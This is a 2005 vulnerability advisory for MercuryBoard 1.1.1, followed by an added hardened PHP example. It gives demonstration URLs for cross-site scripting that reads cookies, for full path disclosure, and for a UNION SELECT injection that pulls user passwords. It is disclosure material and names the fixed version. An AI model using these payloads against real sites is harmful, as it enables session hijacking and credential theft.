Category:   Application (Forum/Board/Portal)  >   MercuryBoard
Vendors:   mercuryboard.com
MercuryBoard Discloses Path to Remote Users and Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1012984
SecurityTracker URL:  http://securitytracker.com/id/1012984
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 25 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.1.1
Description:   Several vulnerabilities were reported in MercuryBoard. A remote user can conduct cross-site scripting attacks and determine the installation path.

CODEBUG Labs reported that the 'func/pm.php' script does not properly validate the user-supplied 's' parameter. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the MercuryBoard software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/index.php?a=pm&s='><script>alert(document.cookie)</script>

The 'func/members.php' script does not properly validate user-supplied input in the 'l' parameter, allowing cross-site scripting attacks. A demonstration exploit URL is provided:

http://[target]/index.php?a=members&l='><script>alert(document.cookie)</script>

Some other functions and parameters are affected, as shown in the following demonstration exploit URLs:

http://[target]/index.php?a='><script>alert(document.cookie)</script>
http://[target]/index.php?a=post&s='><script>alert(document.cookie)</script>
http://[target]/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>
http://[target]/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>
http://[target]/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>
http://[target]/index.php?a=cp&s='><script>alert(document.cookie)</script>

A remote user can determine the installation path due to input validation flaws in 'global.php'. A demonstration exploit URL is provided:

http://[target]/index.php?a=forum&f=2&min=0&n=0

The following files are also affected:

lib/jpgraph/jpgraph_bar.php
lib/jpgraph/jpgraph_log.php
lib/jpgraph/jpgraph_polar.php
admincp/admin.php

All of the scripts in the 'func' directory are also affected.

A remote authenticated administrator can supply a specially crafted URL to inject SQL commands. A demonstration exploit URL is provided:

http://[target]/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the MercuryBoard software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

A remote authenticated administrator can execute SQL commands on the underlying database.

Solution:   The vendor has released a fixed version (1.1.2), available at:

http://www.mercuryboard.com/index.php?a=downloads

Vendor URL:  www.mercuryboard.com/
Cause:   Access control error, Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Mon, 24 Jan 2005 22:37:47 +0100
Subject:  Multiple vulnerabilities in MercuryBoard 1.1.1


*************************************************************
* CODEBUG Labs
* Advisory #7
* Title: Multiple vulnerabilities in MercuryBoard 1.1.1
* Author: Alberto Trivero
* English Version: Alberto Trivero
* Product: MercuryBoard 1.1.1
* Type: Multiple Vulnerabilities
* Web: http://www.codebug.org/
*************************************************************


--) Software Page (www.mercuryboard.com)

"MercuryBoard is a powerful message board system dedicated to raw speed with
a mixture of features, ease of use, and ease of customization coupled with
expandability, and diverse language services." Note that it is written in PHP OOP.


--) Full Path Disclosure

Let's look at original code from global.php line 604:

<?
    ...
    // some base variables
    $current = ceil($min / $num);
    $string  = null;
    $pages   = ceil($rows / $num);
    $end     = ($pages - 1) * $num;
    ...
?>

As we can see there isn't a check on $num, and so if we simply assign to
$num the value 0 (or a non-numerical argument), there will be an impossible
division by zero that shows the full path:

    http://www.sitewithmercuryboard.com/index.php?a=forum&f=2&min=0&n=0

Other Full Path Disclosure:

    http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_bar.php
    http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_log.php
    http://www.sitewithmercuryboard.com/lib/jpgraph/jpgraph_polar.php
    http://www.sitewithmercuryboard.com/admincp/admin.php
    http://www.sitewithmercuryboard.com/func/[file] <--- All the PHP files in
the directory: active.php board.php constants.php cp.php debug.php email.php
forum.php help.php login.php members.php mod.php pm.php post.php printer.php
profile.php register.php search.php topic.php


--) Cross-Site Scripting (XSS)

Let's look at original code from /func/pm.php line 36:

<?
    ...
    if (!isset($this->get['s'])) {
      $this->get['s'] = null;
    }
    switch($this->get['s'])
    {
    case 'send':
      return $this->send();
      break;
    case 'view':
      return $this->view();
      break;
    case 'delete':
      return $this->delete_pm();
      break;
    case 'clear':
      return $this->clear();
      break;
    default:
      return $this->folder();
      break;
    }
    ...
?>

As we can see there is a switch/case block on 's', but in this block there
isn't any check if we put another parameter into 's', like this XSS code:


http://www.sitewithmercuryboard.com/index.php?a=pm&s='><script>alert(document.cookie)</script>

Let's look again at original code from /func/members.php line 35:

<?
    ...
    if (!isset($this->get['l'])) {
      $this->get['l'] = null;
    } else {
      $this->get['l'] = strtoupper($this->get['l']);
    }
    ...
?>

As we can see, also in this case, there are no parsing methods for the
processing of 'l', so nothing prevents us from doing an XSS attack:


http://www.sitewithmercuryboard.com/index.php?a=members&l='><script>alert(document.cookie)</script>

Other Cross-Site Scripting:


http://www.sitewithmercuryboard.com/index.php?a='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=pm&s=send&to=2&re='><script>alert(document.cookie)</script>

http://www.sitewithmercuryboard.com/index.php?a=cp&s='><script>alert(document.cookie)</script>


--) SQL Injection

For the same reason that it's possible to execute the XSS codes described
before, it's also possible to do SQL injection attacks. But in this case it's
a non-critical bug. Why? Because we first need to log in as forum
administrator to make a successful attack. For example:


http://www.sitewithmercuryboard.com/index.php?a=post&s=reply&t=0%20UNION%20SELECT%20user_id,%20user_password%20FROM%20mb_users%20/*

With the URL above we get, for the reason just described, an error like
this (verified only on MercuryBoard 1.1.0):

    The used SELECT statements have a different number of columns


--) Patch

After reporting these bugs to the developers of the board, they released
version 1.1.2 of MercuryBoard, which corrects them:
http://www.mercuryboard.com/index.php?a=downloads


*************************************************************
        http://www.codebug.org
*************************************************************
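An added example, not MercuryBoard's code and not part of the advisory above: hardened counterparts of the two patterns it quotes, the global.php pagination arithmetic (division by an unchecked $num) and the func/pm.php 's' dispatch (unchecked value reflected into HTML). The function names paginate() and dispatchPm(), the page-size bounds and the default of 20 per page are assumptions.

```php
<?php
// Added example, not MercuryBoard's code: hardened versions of the two
// patterns quoted in the advisory (global.php pagination, func/pm.php 's').
declare(strict_types=1);

// global.php computes ceil($min / $num) with no check on $num, so n=0
// raises a division-by-zero warning whose message prints the script path.
// Here the page size is validated before it can reach the division.
// Function name, the bounds and the default of 20 are assumptions.
function paginate(array $get, int $rows, int $defaultPerPage = 20): array
{
    // Only positive integers are accepted; 0, negatives and non-numeric
    // values fall back to the default instead of reaching the division.
    $num = filter_var($get['n'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 200]]);
    if ($num === false) {
        $num = $defaultPerPage;
    }
    $min = filter_var($get['min'] ?? 0, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]);
    if ($min === false) {
        $min = 0;
    }
    $pages   = max(1, (int) ceil($rows / $num));
    $current = min((int) ceil($min / $num), $pages - 1);
    return ['num' => $num, 'pages' => $pages, 'current' => $current,
            'end' => ($pages - 1) * $num];
}

// func/pm.php switches on 's' and sends any unknown value to the default
// case, and the raw value reaches the HTML output unescaped. Here the value
// is checked against an allowlist, and whatever is echoed back is escaped.
function dispatchPm(?string $s): array
{
    $allowed = ['send', 'view', 'delete', 'clear'];
    if ($s === null || in_array($s, $allowed, true)) {
        return ['action' => $s ?? 'folder', 'html' => ''];
    }
    // Unknown value: fall back to the folder view; if it is mentioned at
    // all, htmlspecialchars() turns '><script> into inert text.
    $safe = htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
    return ['action' => 'folder', 'html' => '<p>Unknown action: ' . $safe . '</p>'];
}

// Constructed inputs taken from the advisory's demonstration URLs.
var_dump(paginate(['min' => '0', 'n' => '0'], 57)['num']);          // int(20), no warning
echo dispatchPm("'><script>alert(document.cookie)</script>")['html']; // escaped, no script
```

Independently of the code fix, display_errors should be off on production PHP hosts so that any warning that does slip through is logged rather than rendered with its file path.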
